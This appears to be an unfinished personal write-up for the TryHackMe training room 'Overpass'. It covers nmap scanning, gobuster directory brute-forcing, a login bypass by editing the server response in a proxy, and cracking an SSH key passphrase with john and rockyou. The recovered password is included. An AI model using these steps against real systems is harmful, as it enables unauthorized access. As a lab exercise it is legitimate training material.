Overpass

Room Link: https://tryhackme.com/room/overpass

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Click 'Resonse to this request' this will let us see the response and edit it.

This is the response you get for an incorrect password

I changed it forward to /admin instead

Forward the request, disable FoxyProxy from the browser and see the page.

TCP/22 - SSH

Kali

/opt/john/ssh2john.py id_rsa.pub > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt 

Kali

ssh james@$VICTIM -i id_rsa.pub 
Password: james13

Stopped here because I can't finish on Attackbox because port 80 is in use